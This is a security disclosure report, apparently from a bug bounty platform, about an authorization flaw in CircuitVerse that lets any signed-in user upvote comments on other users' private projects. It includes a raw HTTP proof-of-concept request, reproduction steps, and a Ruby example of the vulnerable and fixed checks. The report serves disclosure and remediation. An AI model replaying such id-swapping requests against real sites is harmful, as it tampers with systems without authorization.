Improper Privilege Management in circuitverse/circuitverse

Valid

Reported on

Aug 24th 2021


✍️ Description

Any signed-in user can upvote a comment that belongs to another user's private project; the upvote endpoint never checks whether the requester may view the project the comment is in.

🕵️‍♂️ Proof of Concept

The request below can be used to upvote any comment on a private project:

POST /commontator/comments/1312/upvote HTTP/2
Host: circuitverse.org
Cookie: 
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://circuitverse.org/users/90744/projects/proje1-20dc2034-2a88-4010-9464-d99fdd64ee71
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
X-Csrf-Token: qnOZ/QTTwZlQC3yXyPIl/NnLvpx14vzlX9B+BZex/eCHlWukjpBB6XxmB4xZkSLa7lpxJtE3gdt06Wmzd6kWaA==
Origin: https://circuitverse.org
Content-Length: 11
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

_method=put

In this request, change the comment id in the path to the id of any other comment and that comment will be upvoted, even if the project it belongs to is private.

Steps

1. There are two users: user-A and user-B.
2. User-A creates a private project and posts a comment on it.
3. Log in as user-B and send the request above, with the comment id replaced by the id of user-A's private comment. The private comment is upvoted.
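The missing check described above, as an added example and not code from CircuitVerse or the commontator gem: a plain-Ruby model of an upvote handler in its vulnerable form (any signed-in user may upvote any comment id) next to a hardened form that first resolves the comment's parent project and requires the requester to be able to see it. All names here (User, Project, Comment, can_upvote?, handle_upvote) are hypothetical; the sample data is constructed to mirror the two-user scenario in the report.

```ruby
# Added example, not the project's own code. Names and data are hypothetical.
User    = Struct.new(:id)
Project = Struct.new(:id, :owner_id, :public, :collaborator_ids)
Comment = Struct.new(:id, :project, :author_id)

# Vulnerable form: being signed in is the only requirement, so the comment id
# in the URL can be swapped for the id of a comment on someone else's private
# project (the flaw the report describes).
def vulnerable_can_upvote?(user, comment)
  !user.nil? && !comment.nil?
end

# Visibility rule for a project: public projects are visible to everyone,
# private ones only to the owner and collaborators.
def project_visible_to?(user, project)
  return true if project.public
  return false if user.nil?
  project.owner_id == user.id || project.collaborator_ids.include?(user.id)
end

# Hardened form: authorization is decided on the comment's parent project,
# not on the comment id the client supplied.
def can_upvote?(user, comment)
  return false if user.nil? || comment.nil?
  project_visible_to?(user, comment.project)
end

# Controller-style handler returning the HTTP status a PUT .../upvote should
# produce. An invisible project answers 404, the same as a missing comment,
# so the response does not confirm that a given comment id exists.
def handle_upvote(user, comments_by_id, comment_id)
  return 401 if user.nil?
  comment = comments_by_id[comment_id]
  return 404 if comment.nil?
  return 404 unless project_visible_to?(user, comment.project)
  200
end

# Constructed sample data: user-A owns a private and a public project and has
# commented on both; user-B is an unrelated signed-in user.
USER_A = User.new(1)
USER_B = User.new(2)
PRIVATE_PROJECT = Project.new(10, USER_A.id, false, [])
PUBLIC_PROJECT  = Project.new(11, USER_A.id, true, [])
COMMENTS = {
  1312 => Comment.new(1312, PRIVATE_PROJECT, USER_A.id),
  1313 => Comment.new(1313, PUBLIC_PROJECT, USER_A.id)
}

if __FILE__ == $0
  puts "vulnerable check, user-B on private comment: #{vulnerable_can_upvote?(USER_B, COMMENTS[1312])}"
  puts "hardened check,   user-B on private comment: #{can_upvote?(USER_B, COMMENTS[1312])}"
  puts "hardened check,   user-B on public comment:  #{can_upvote?(USER_B, COMMENTS[1313])}"
  puts "handler status,   user-B PUT /comments/1312/upvote: #{handle_upvote(USER_B, COMMENTS, 1312)}"
end
```

The point of the hardened form is that the object the client names (the comment) is never trusted on its own; the handler walks to the object that actually carries the access rule (the project) and checks that before acting. The same shape applies to every action reachable by id on a comment, not only upvote.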

We have contacted a member of the circuitverse team and are waiting to hear back (a year ago)

ranjit-git (Researcher), a year ago:


@maintainer I see the bug is now fixed.
Can you please mark this report as valid?

Aboobacker MK validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Aboobacker MK confirmed that a fix has been merged on 13d4cc a year ago
The fix bounty has been dropped